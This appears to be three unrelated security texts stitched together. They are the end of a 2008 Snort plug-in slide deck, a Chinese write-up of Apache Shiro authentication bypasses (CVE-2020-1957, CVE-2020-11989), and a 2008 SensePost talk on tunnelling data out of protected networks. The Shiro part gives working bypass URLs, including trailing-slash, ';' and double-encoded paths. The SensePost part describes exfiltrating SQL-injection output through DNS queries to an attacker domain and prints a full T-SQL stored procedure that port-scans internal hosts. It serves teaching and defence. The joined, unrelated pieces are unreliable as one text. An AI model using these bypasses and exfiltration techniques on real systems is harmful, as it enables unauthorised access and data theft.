FLOW_ESTABLISHED|FLOW_TO_CLIENT
};
static RuleOption activeXFlowOption = {
OPTION_TYPE_FLOWFLAGS,
{
&activeXFlowFlags
}
};
ENGINE_LINKAGE int checkFlow(void *p, FlowFlags
*flowFlags);
Snort Plug-in API
Flow Matching
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
extern Rule sid109;
extern Rule sid637;
Rule *rules[] =
{
&sid109,
&sid637,
NULL
};
/* automatically handled by the dynamic rule framework */
ENGINE_LINKAGE int RegisterRules(Rule **rules);
Snort Plug-in API
Dynamically Registering Rules
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Optional C packet processing callback
Returns RULE_MATCH or RULE_NOMATCH
sf_snort_plugin_api.h:
typedef int (*ruleEvalFunc)(void *);
typedef struct _Rule {
[…]
ruleEvalFunc evalFunc;
[…]
} Rule;
Snort Dynamic Rules
Implementation
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
my_dynamic_rule.c:
#include "sf_snort_plugin_api.h"
#include "sf_snort_packet.h"
int myRuleDetectionFunc(void *p);
Rule myRule = {
[…],
&myRuleDetectionFunc,
[…]
};
Snort Dynamic Rules
Implementation (2)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
my_dynamic_rule.c (con't):
int myRuleDetectionFunc(void *p) {
SFSnortPacket *sp = (SFSnortPacket *) p;
if ((sp) && (sp->ip4_header.identifier % (u_int16_t)2))
return RULE_MATCH;
return RULE_NOMATCH;
}
•
Question for Audience: What does this do?
Snort Dynamic Rules
Implementation (3)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Another key header file: "sf_dynamic_preprocessor.h"
•
Key struct: "DynamicPreprocessorData"
Typically defined as extern variable named "_dpd"
•
Contains:
Functions to add callbacks for Init / Exit / Restart
Internal logging functions
Stream API
Search API
Alert functions
Snort Inline (IPS) functions
Snort Dynamic Preprocessors
Background
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
void SetupActiveX(void) {
_dpd.registerPreproc("activex", ActiveXInit);
}
static void ActiveXInit(char *args) {
_dpd.addPreproc(ProcessActiveX,
PRIORITY_TRANSPORT, PP_ACTIVEX);
}
static void ProcessActiveX(void* pkt, void* contextp) {
[…]
_dpd.alertAdd(GENERATOR_SPP_ACTIVEX,
ACTIVEX_EVENT_KILLBIT, 1, 0, 3,
ACTIVEX_EVENT_KILLBIT_STR, 0);
return;
}
Snort Dynamic Preprocessors
spp_activex.c
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
We can try calling rule option matching functions directly,
but need internal structures first properly initialized.
•
Use dummy Rule struct and ruleMatch():
ENGINE_LINKAGE int ruleMatch(void *p, Rule *rule);
•
RegisterOneRule(&rule, DONT_REGISTER_RULE);
•
Confusing, huh?
•
RegisterOneRule will setup Aho-Corasick and internal ptrs
•
But we don't always want to register the rules as an OTN
•
So, pass in DONT_REGISTER_RULE. See?
Snort Plug-in API
Using Rules Within a Dynamic Preprocessor
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Available under:
http://www.secureworks.com/research/tools/snort-
plugins.html
•
Released under GPLv2 (or later)
•
No Support
•
No Warranty
•
Use at Your Own Risk
•
Feedback is appreciated!
SecureWorks Snort Plug-ins
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Inspects web traffic for scripting instantiating "vulnerable"
ActiveX controls
As based on public vulnerability disclosures
•
Preprocessor configuration points to local DB of ActiveX
controls
Listed by CLSID and optionally method/property
XML format (I know, I know…)
•
Looks at traffic being returned from HTTP servers
ActiveX instantiation and Class ID
Access to ActiveX control's methods / properties
ActiveX Detection Dynamic Preprocessor
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Can presently be bypassed
JavaScript obfuscation
HTTP encodings
But many attackers still using plain CLSID!
•
Future Snort Inline support
Drop or TCP RST the HTTP response
•
Leveraging of normalization done by HTTP Inspect
•
Enhance to use Unified2 extra data to log detected domain
name
ActiveX Detection Dynamic Preprocessor
Continued
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Uses matchRule(Rule*) from Snort Plug-in API
Very convenient
Not the most efficient
•
Performs naïve linear search of CLSIDs
Enhance to reuse HTTP Inspect's high-performance
data-structures?
•
Uses Snort's flow match
•
Performs content matching and PCRE matching
ActiveX Detection Dynamic Preprocessor
Internals
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Live Demo
ActiveX Detection Dynamic Preprocessor
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Lack of sufficient entropy in PRNG delivered by Debian's
OpenSSL package
•
Go see Luciano Bello and Maximiliano Bertacchini's talk!
Saturday, 13:00 – 13:50, Track 4
•
One of the coolest vulns of 2008!
Pwnie for Mass 0wnage!
•
Keys generated since 2006-09-17
•
Keys generated with Debian Etch, Lenny or Sid
Downstream distros such as Ubuntu also vulnerable
Debian OpenSSL Predictable PRNG Vuln
CVE-2008-0166
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Debian OpenSSL Predictable PRNG Vuln
Dilbert (source: H D Moore, metasploit.com)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Debian OpenSSL Predictable PRNG Vuln
XKCD (source: H D Moore, metasploit.com)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
From the Debian Wiki (http://wiki.debian.org/SSLkeys):
•
"… any DSA key must be considered compromised if it has
been used on a machine with a ‘bad’ OpenSSL. Simply
using a ‘strong’ DSA key (i.e., generated with a ‘good’
OpenSSL) to make a connection from such a machine may
have compromised it. This is due to an ‘attack’ on DSA that
allows the secret key to be found it the nonce used in the
signature is known or reused.”
•
H D Moore was all over this one with a quickness!
Metasploit hosting lists of brute-forced 'weak' keys
Debian OpenSSL Predictable PRNG Vuln
It’s Bad!
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
You scanned your assets for SSH / SSL servers using the
blacklisted keys, right? (Tenable Nessus)
•
You scanned all user home dirs for blacklisted SSH keys?
Debian ssh-vulnkey tool
•
You scanned all user homedirs, Windows Protected
Storage, and browser profiles for blacklisted SSL certs,
right?
•
But what about connections to external servers that use
the vulnerable Debian OpenSSL?
Debian OpenSSL Predictable PRNG Vuln
Detection & Mitigation
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Goal: Detect SSH Diffie-Hellman Key Exchange (KEX)
where client and/or server are OpenSSH linked against
vulnerable Debian OpenSSL
•
Just that detective capability is valuable
Even w/ great technical controls in place, you're likely
missing:
• Users connecting to external servers using bad
OpenSSL
• Connections to/from external hosts that use bad
OpenSSL
•
What else can we do?
Debian OpenSSL Predictable PRNG Preproc.
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Goal: Have preprocessor(s) "normalize" traffic by brute-
forcing the DH key exchange, decoding both sides of
session on-the-fly.
Snort rule matching engine and other preprocessors can
then inspect unencrypted session
Unencrypted sessions can be logged (Unified or PCAP)
•
Potential issue w/ source code release
Controls on the export of cryptanalytic software (US)
Debian OpenSSL Predictable PRNG Preproc.
Continued
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Alexander Klink
http://seclists.org/fulldisclosure/2008/May/0592.html
http://www.cynops.de/download/check_weak_dh_ssh.pl
.bz2
•
Paolo Abeni, Luciano Bello & Maximiliano Bertacchini
Wireshark patch to break PFS in SSL/TLS
https://bugs.wireshark.org/bugzilla/show_bug.cgi?
id=2725
•
Raphaël Rigo & Yoann Guillot
New work on SSH and Debian OpenSSL PRNG Vuln
Unknown to me until hearing about it at DEFCON
http://www.cr0.org/progs/sshfun/
Debian OpenSSL Predictable PRNG Preproc.
Credits
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
A way for two parties to agree on a random shared secret
over an insecure channel.
•
Server sends to Client
p – large prime number
g – generator of the field (Zp)* (typically 0x02)
•
Client generates random number a
Calculates ga mod p
Sends calculated value to server
•
Server generates random number b
Calculates gb mod p
Sends calcualted value to client
Diffie-Hellman Key Exchange for SSH
Do the Math!
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
DH shared secret is defined as both a function of a and of
b, so only parties that know a or b can calculate it.
•
Client
knows g, a and gb mod p
Calculates shared secret as (gb)a = gab mod p
•
Server
knows g, b and ga mod p
Calculates shared secret as (ga)b = gab mod p
Diffie-Hellman Key Exchange for SSH
Do the Math! (2)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Eavesdropper knows g, ga mod p and gb mod p
•
Can't calculate gab mod p from ga mod p and gb mod p
•
Must solve the discrete logarithm problem
No known (non-quantum) algorithm to solve in
polynomial time
Polynomial-Time Algorithms for Prime Factorization and
Discrete Logarithms on a Quantum Computer
Peter W. Shor, AT&T Research
30 August 1995, Revised 25 January 1996
arXiv:quant-ph/9508027v2
Diffie-Hellman Key Exchange for SSH
Do the Math! (3)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Encryption IVs and Keys generated from DH shared secret
•
VC, VS – Client / Server's SSH version announce string
•
IC, IS – Client / Server's SSH_MSG_KEXINIT message
•
KS – Server's Public Host Key
•
H = hash(VC || VS || IC || IS || KS || ga mod p || gb mod p || gab mod p)
•
SSH session_id = H of initial DH key exchange
•
IV client to server: hash(gab mod p || H || "A" || session_id)
•
IV server to client: hash(gab mod p || H || "B" || session_id)
•
Enc Key client to server: hash(gab mod p || H || "C" || session_id)
•
Enc Key server to client: hash(gab mod p || H || "D" || session_id)
Diffie-Hellman Key Exchange for SSH
Do the Math! (4)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
If OpenSSH client or server is linked against vulnerable
Debian OpenSSL
a or b is completely predictable based on ProcessID of
OpenSSH
•
We can quickly brute force a or b.
Only 32768 possibilites!
•
If we know a or b, we can calculate DH shared secret
gab mod p = (gb)a = (ga)b
•
Once we know the DH shared secret, we have everything
needed to decrypt the SSH session layer!
The Debian OpenSSL PRNG and SSH DH GEX
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Tunneled Clear Text Passwords are compromised
…if either client or server is using vulnerable OpenSSL
RSA / DSA public key authentication is not affected
•
Files or other data protected by SSH Session layer are
compromised
•
…if either client or server is using vulnerable OpenSSL
•
Observers can easily tell if either client or server is using
vulnerable OpenSSL
…and proceed to decrypt the stream
The Debian OpenSSL PRNG and SSH DH GEX
The Impact
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Live Demo
Detection of SSH Diffie-Hellman KEX using
vulnerable Debian OpenSSL
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Snort v3
Complete redesign from the ground up
Extremenly flexible and extensible architecture
Snort 2.8.x matching engine plugs in as module
HW optimized packet acquisition can be plugged in
Lua programming language!
•
Snort 2.8.3 (Release Candidate)
Enhancements to HTTP Inspect
• Normalized Buffers for Method, URI, Headers,
Cookies, Body
• Content and PCRE matching against new buffers
New HTTP normalization exposed in Snort Plug-in API
Snort Futures
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Snort is a powerful framework to work with
APIs for alerting, logging, Streams, matching
Why reinvent the wheel?
•
Hopefully, you can take away needed info to start writing
your own plug-ins.
•
Read the source code of other plug-ins, ask questions.
•
Snort v2 is still evolving. If the APIs don't support
something you (and potentially others?) really need, ask
and ye may receive.
Wrapping It All Up
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Thanks to DT, the Goons
and everyone who made
DEFCON a reality this year!
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Greetz to DC404, Atlanta's DC Group!
Speakers: dr.kaos, Carric, David Maynor, Scott Moulton
& Adam Bregenzer
And our very own Goon, dc0de!
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Questions?
[email protected] | pdf |
S-shiro权限绕过
环境搭建
源码地址
使用github下载器即可下载
CVE-2020-1957
代码配置
认证设置
package org.javaboy.shirobasic;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import java.util.LinkedHashMap;
import java.util.Map;
/**
* @Author 江南一点雨
* @Site www.javaboy.org 2019-06-05 11:16
*
* 在这里进行 Shiro 的配置
* Shiro 的配置主要配置 3 个 Bean 。
*
* 1. 首先需要提供一个 Realm 的实例
* 2. 需要配置一个 SecurityManager,在 SecurityManager 中配置 Realm
* 3. 配置一个 ShiroFilterFactoryBean ,在 ShiroFilterFactoryBean 中指定路径拦截规则
等
*/
@Configuration
public class ShiroConfig {
@Bean
MyRealm myRealm() {
return new MyRealm();
}
@Bean
SecurityManager securityManager() {
DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
manager.setRealm(myRealm());
return manager;
}
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean() {
ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
//指定 SecurityManager
controller代码
bean.setSecurityManager(securityManager());
//登录页面
bean.setLoginUrl("/login");
//登录成功页面
bean.setSuccessUrl("/index");
//访问未获授权路径时跳转的页面
bean.setUnauthorizedUrl("/unauthorizedurl");
//配置路径拦截规则,注意,要有序
Map<String, String> map = new LinkedHashMap<>();
map.put("/doLogin", "anon");
map.put("/hello/*","authc");
//map.put("/**", "authc");
bean.setFilterChainDefinitionMap(map);
return bean;
}
}
package org.javaboy.shirobasic;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* @Author 江南一点雨
* @Site www.javaboy.org 2019-06-05 11:24
*/
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("登录成功!");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("登录失败!");
}
}
@GetMapping("/hello")
public String hello() {
return "hello";
}
@GetMapping("/login")
public String login() {
return "please login!";
}
漏洞复现
1. 访问 /hello/1 接口需要进行认证,直接跳转
2. 权限绕过: /hello/1/
漏洞分析
漏洞成因
PathMatchingFilterChainResolver#getChain() ,该函数作用根据 URL 路径匹配中配置的
url 路径表达式来匹配输入的 URL ,判断是否匹配拦截器,匹配成功将会返回响应的拦截器执行
链,让 ShiroFither 执行权限操作的。
其对于 URL 路径表达式和输入 URL 的匹配主要通过 pathMathches 函数进行匹配。全局搜索该方
法(idea双击shift可以全局搜索,包括jar包)
@GetMapping("/hello/{currentPage}")
public String hello(@PathVariable Integer currentPage) {
return "hello" + currentPage.toString();
}
}
首先是获取到 filterCHains ,然后将 requestURI 和 filterChain 进行比较,进入
this.pathMatches 方法。
this.getPathMatcher() 获取 AntPathMatcher 对象,然后经过一系列调用最后进入
AntPathMatcher.doMatch 方法。
前面的一系列比较,两种路径的执行一致,重点在这个返回值当中。
可以这个返回值如果 pattern 没有以 / 结束,那么就返回 !path.endswith('/') ,这样一
来 /hello/1 返回值为 true , /hello/1/ 返回值为 false ,而返回为 false 的话 do-while 循环
不会结束,会判断是否还有下一个 过滤器 ,当过滤器为空就返回 null 。
修复方法
配置过滤器时写成 /hello/** 这种形式。判断 URL 不能为 / 结尾
CVE-2020-11989
代码配置
版本<1.5.2,项目通过虚拟路径访问:http://localhost:8089/.;/shiro/admin/page 参考文章
认证配置
package org.syclover.srpingbootshiro;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import java.util.LinkedHashMap;
controller配置
import java.util.Map;
@Configuration
public class ShiroConfig {
@Bean
MyRealm myRealm() {
return new MyRealm();
}
@Bean
DefaultWebSecurityManager securityManager(){
DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
manager.setRealm(myRealm());
return manager;
}
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean(){
ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
bean.setSecurityManager(securityManager());
bean.setLoginUrl("/login");
bean.setSuccessUrl("/index");
bean.setUnauthorizedUrl("/unauthorizedurl");
Map<String, String> map = new LinkedHashMap<>();
map.put("/doLogin", "anon");
map.put("/admin/*", "authc");
bean.setFilterChainDefinitionMap(map);
return bean;
}
}
package org.syclover.srpingbootshiro;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("success");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("failed");
}
}
@GetMapping("/admin/page")
漏洞复现
漏洞分析
public String admin() {
return "admin page";
}
@GetMapping("/login")
public String login() {
return "please login!";
}
}
首先明显修复了上面的这个问题
测试发现正常请求和权限绕过请求得到的 requestURI 是不一样的,权限绕过得到的是 / ,所以重
点放在 this.getPathWithinApplication() 方法上面。
正常请求
权限绕过请求
问题出在这个 decodeAndCleanUriString 方法上,会对 url 中的 ; 进行截取,然后舍弃分号后面
的内容。这样得到的 url 路径就是 / 。
不配置虚拟路径与配置虚拟路径
这两种情况下,不配置虚拟路径的时候经过 valueOrEmpty(request.getContextPath()) 的处
理变为空,返回的最终的 path 就是请求的 path 。
CVE-2020-11989-玄武实验室
说明
这个绕过是基于 shiro 获取 requestURI 的时候会进行 URLDecode ,利用双重编码绕过。参考文
章
漏洞环境
package org.syclover.srpingbootshiro;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("success");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("failed");
}
}
@GetMapping("/admin/{name}")
public String hello(@PathVariable String name) {
return "hello"+ name;
}
}
漏洞复现
%25%32%66->%2f->/
漏洞分析 | pdf |
Pushing a Camel through the
eye of the Needle!
[Funneling Data in and out of Protected Networks]
SensePost 2008
About:us
• SensePost
– Specialist Security firm based in South Africa;
– Customers all over the globe;
– Talks / Papers / Books
• {marco,haroon}@sensepost.com
– Spend most of our time breaking stuff
((thinking about breaking stuff) or playing
foosball!)
• What this talk is about ? (Hint: not foosball!)
What this talk is about?
A progression of Attacks
• A brief trip to the past (1601-1990)
• Un-firewalled access to victim host
• And also un-firewalled to rest of the
network!
History (Continued.)
• The Introduction of firewalls..
• The failure to filter outbound traffic (circa
2000)
• CommandExec.[asp|jsp|php|*]
{The need for a comfortable Channel}
History (Continued.)
• Creating binaries on remote victim.
• debug.exe and friends
• upload.asp (and friends)
• Win32 Port Binding (1998)
Remote Exec (with feeling!)
• We really needed to use the words AJAX
and XMLHttpRequest object to qualify as
a web 2.0 talk.
• We will still add XML, SOAP and a tool
with no vowels in its name (watch for this!)
Time to pivot™
• This stuff is ancient history.
• Sp_quickkill
• Extreme nc usage
• SensePost tcpr / Foundstonefport (Circa 2000)
Client
Pivot
Target
Start tcpr
• XP and IPV6!
• Ssh tunnel
Listens on port
55555
Connects to
pivot:55555
Pivot connects to
target
Proxied connection between client and target
SSH Tunnels (a)
Client
Pivot
Target
Listens on
port 22
Pivot runs sshd
ssh –L
55555:pivot:25
Proxied connection from Client to Target port
Listens on
port 55555
Listens on
port 25
SSH Tunnels (b)
• Instead lets look at –R
• So all we need is an ssh client on the
remote machine, an SSHD on one of ours
and we are in the game!
• putty + plink FTW!
Local
machine
Client is
the Pivot
Target
Listens on
port 22
ssh –R
55555:localmachin
e:445
Target runs sshd
Listens on
port 445
Proxy connection from target:55555 to local machine:445
Listens on
port 55555
Interlude (dns2tcp)
• Available from:
http://www.hsc.fr/ressources/outils/dns2tcp
/
• Perfect for homes away form home
• Perfect for stealing wifi access
A good marriage (sshtun +
dnstun)
Layer 2 bridges
• If you aren’t going to the network, bring
the network to you
• If you’re bridging the network, make it
protocol independent
• Requires inbound or outbound connection
ability
Layer 2 bridges
• Pros
– Clean interface to network
– Not port or connection dependent, protocol
independent
– Simple to setup and use
• Cons
– Death by firewall
– Requires external deps (pcap,libnet)
• Examples
– Tratt by Olleb (www.toolcrypt.org)
– MyNetwork by Greg Hoglund (www.rootkit.com)
A Brief Recap
• We used to be able to hit everything we
wanted to.
• We were happily redirecting traffic when
firewalls were more forgiving
• Outbound Access Made us amazingly
happy.
• Network level bridging was cool but the
rules are changing..
• Can we do this completely over HTTP /
HTTPS?
Introducing glenn.jsp
• (Working title)
a)We can hit our target on port 80 (or 443)
b)Ability to upload / create a web page on
the target [example: JMX Console]
c)Network level filtering is tight.
d)Possible reverse proxies in-between
• [a],[b],[c],[d] meet [one smart intern]
ReDuh.jsp
•
Written by Glenn Wilkinson ([email protected])
•
Upload / Create .JSP page on server
•
Fire-up local proxy (localhost:1234)
•
Tell web-page to create web-bridge to internal_host:3389
– JSP creates socket to internal_host:3389
– JSP creates queues to handle internal comms.
•
Attacker aims RDC client at local proxy on 127.0.0.1:1234
– Local endpoint accepts traffic, converts packets to base-64
encoded POST messages.
– Packets are POSTed to .JSP page
•
JSP Page decodes packets, queues for delivery via created
socket.
– Return traffic is queued, encoded as base64 and queued again.
•
Proxy polls server for return packet data, recreates them as
packets and re-feeds the local socket.
What this means..
• We have a simple TCP over HTTP/HTTPS
implementation
• It requires the creation of a simple, single
.JSP file on the target..
• Surely this isn’t .JSP specific ?
• [email protected] ported this while
cursing a lot to ASP.net
• [email protected] gave us the php
version.
• Basically covers most of the common
cases.. If we can create a web page, we can
create a circuit..
Squeeza
• Released at BH USA 2007
• Advanced SQL injection tool (another one on
the pile…), aimed at MS SQL
• Treated injection slightly differently
• Split content generation from return channel
– Content generation
– Supported multiple return channels
• Could mostly mix ‘n match content
generation modes with return channels
Squeeza
• Content created (not the interesting part)
– Command execution: xp_cmdshell (old faithful)
– Data extraction: select name from sysobjects where
xtype=‘U’
– File download: bulk insert … from ‘c:\blah.txt’
• Return channels (more interesting part)
– DNS
– Timing
– HTTP Error-based (ala Automagic SQL Injector)
• Return channels NOT supported
– Inline HTML extraction
– Standard blind injection techniques
Squeeza process overview
Generate content using command execution, file copy or
data extraction injection string
Store data in a temporary table inside SQL database
Extract data using return channel of choice: DNS, timing,
SQL error messages
Not fast enough for real-time applications, but
good enough for batch applications such as
command execution, file copy etc. Don’t
expect to relay VNC traffic.
Squeeza: DNS
•
Weaponised SQL server content extraction through DNS
queries
•
Data broken up into chunks, encoded and emitted through
DNS
•
Which meant:
– Entire DNS channel handled in SQL
– Elevated privs not required (but used if available)
– Provided reliability guarantees, since client had complete
control over what was requested and received
•
Compare to SQLNinja (awesome tool, DNS not so much)
– requires binary upload+cmd execution
– reliability guarantee is ‘try again’, as client can’t control
remote binary
Temp table
Attacker
Victim
WWW/SQL
Server
exec xp_cmdshell ‘ipconfig /all’
Basic setup: attacker has SQL injection vulnerability into SQL server, as
‘sa’
Command is run on SQL server
Output is produced
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.47
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2
Output is stored in DB
Second injection string
Grab limited chunk of data from temporary table, convert to hex, tack on
domain
57696e646f777320495020436f6e66696775726174696f6e.sensepos
t.com
Windows IP Configuration
Initiate DNS request with encoded data
Attacker
DNS Server
57696e646f777320495020436f6e66696775726174696f6e.sensepost.com
Request is received and converted into original form
Windows IP Configuration
Squeeza: timing
• Weaponised SQL server content
extraction through timing attacks
• Data broken up into chunks, bits
extracted one at a time through timing
differences
• Which meant:
– Didn’t need an explicit return channel
– Not absolutely reliable, but good enough
– Many cups of coffee
Profiling SQL servers
• We want to know which SQL server version we’re
dealing with
• Features added and removed between releases
– 2000 added ????
– 2005 removed xp_execresultset
– 2005 added stored procedure creation functionality
• Common problem with a number of solutions
– select @@version, choose return channel
• What about other methods?
– Look for new/removed tables/stored procs/users
– Look for new SQL syntax
Squeeza future
• Seems too nice to forget
• Not enough uptake
• Maybe piggyback onto Metasploit??
• What would this require?
This OLE’ thing
•
In 2002, Chris Anley’s paper discussed OLE object
instantiation and execution from T-SQL
– Demo’ed file reading/writing, shell execution
– Maybe this got lost in the rest of the goodness
•
How many SQL injection tools ignore OLE attacks?
– ???????????
•
Is it because of privs?
– Hmmmmm, sp_oacreate, sp_oamethod require execute on
those methods
•
Complexity?
– Regular injections used by other tools create/execute stored
procs all the time
•
Payload size?
– Again, current tools are no super packers
Growing OLE’ together
• In 6 years, not much has changed
• We can still use OLE objects (another
route for ActiveX object exploitation?)
• Why this route?
– Safe for scripting
– Killbits
• We think OLE integration deserves much
more focus in injection payloads
Something OLE’, something
new
Example of a usable new OLE payload
SQL-based port scanner
SQL port scanner
• Basis is “MSXML2.ServerXMLHTTP”
object
• Used to retrieve XML data from a
webserver
• Installed with IE, IIS,????
– Two versions on win2k3
• We can specify then IP:port of the target
webserver
• Return values differ depending on
whether a webserver is listening or not
SQL port scanner
• We can tell if ports are open or
closed/filtered
• Even better, basic protocol fingerprinting
since we’re also told if a legitimate
webserver answered
• But how to differentiate between closed
and filtered?
• Same way everyone else does (mostly)
– Timing and timeouts
– setTimeouts
probeip(ip, port)
CREATE PROCEDURE probeip @host VARCHAR(50), @port VARCHAR(5)AS
BEGIN
DECLARE @oINT,@ropINT,@rseINT,@statusINT,@s varchar(60)
set @s='http://'+@host+':'+@port+'/’
EXEC sp_OACreate 'MSXML2.ServerXMLHTTP', @oOUT
EXEC @rop = sp_OAMethod @o, 'setTimeouts', NULL, 3000, 3000,
3000, 3000
EXEC @rop = sp_OAMethod @o, 'open', NULL, 'GET',@s
EXEC @rse = sp_OAMethod @o, 'send’
EXEC sp_OAGetProperty@o, 'status', @status OUT
EXEC sp_OADestroy @o
SELECT @s+CASE@rop WHEN -2147012891 THEN 'Blocked' WHEN 0 THEN
CASE @rse WHEN -2147012744 THEN 'Open' WHEN 0 THEN 'Open/WWW'
WHEN -2147012867 THEN 'Closed' WHEN -2147012894 THEN
'Filtered' WHEN -2147012851 THEN 'Open/WWWR' ELSE 'Invalid'
END END
END
Basic probe stored procedure
Instantiate OLE control
Configure control timeouts
Initialise control (capture return code)
Send request (capture return code)
Grab HTTP status
Test return codes and determine port status
Create URI from ip and port
Putting it together
• Using the probeIP() building block, we
can build further tools
• Port sweepers
– scanports(ip, portlist)
• Portscanners
– scanhosts(iplist, port)
• Webserver detectors
So what does that give us?
• A SQL-based port scanner
• Implemented in a stored proc
• Can scan almost all ports
• Supports HTTP detection
• But why?
– No messy nmap uploads
– No A/V footprints
What’s going to trip us up?
•
Inter-protocol protections
– Cross-protocol attacks have been around for a while
– Been getting a bit of attention again
SandroGauci provided a short paper recently enumerating browser
support
– Browsers provide protection by banning connections to specific
ports
– FF bans 58, Opera bans 58, Safari bans 43
– IE 7 bans 6 ports, IE 6 banned 5 ports, IE 5 didn’t ban at all
– More of a stumble than a trip, all the interesting ports are still
allowed
•
Proxies
– setProxy can disabled proxy requests
•
Speed
– Stats?????
Squeezing OLE juice
• Turns out, sometimes we make the right
decision
• Integrating with Squeeza is simple
– Portscanner generates content
– Can pull results through dns, timing or http
errors
OLE dog, new tricks
• OLE objects deserve lots more looking at
• Why bother with debug scripts, when a
combination of T-SQL and
‘scripting.filesystemobject’ can write anything
to disk?
• Why bother with xp_cmdshell, when
‘scripting.shell’ works just as well regardless
of whether the stored proc is available
• Importantly, this functionality is available
across multiple SQL server versions, making
attacks version independent
SQL2005 – Pen Tester
Nightmare?
• By all accounts SQL 2005 is Microsoft’s SDLC
flagship product
• SQL Server poses some unique challenges:
– Highly Public;
– Highly Exploited;
– Not really directly through Microsoft’s fault!
• They had to take steps to reduce attack surface,
to stop people hurting themselves (think
mandatory seat-belts in cars)
• Much touted SD3 – Secure by Design, Secure by
Default, Secure by Deployment
• Famous hax0r celebrities have stated how they
hate coming up against SQL05 on deployed
applications
I call Shenanigans!
Fundamental problems with ‘05
• Microsoft needed desperately
to reduce the attack surface on
SQL05.
• 1000 stored procedures
available in a default (SQL7)
install?
5:1
• Much publicized lock-down of superfluous
functionality and features.
• This however has 2 major problems
The 2 Big Problems
• Mixed Messages: Incoherent at best and
Dishonest at worst.
• Any software engineer will tell you that
Features will win because of “dancing
pigs” and “management by in-flight
magazine”.
The 2 Big Problems
1. Mixed Messages: Incoherency, In Flight
Magazines and Dancing Pigs.
2. In-Band Signaling:
–
This mistake is so old, it almost hurts to
write it.
–
Cap’n Crunch vs. Telephone Systems
–
Buffer Overflows and Von Neumann
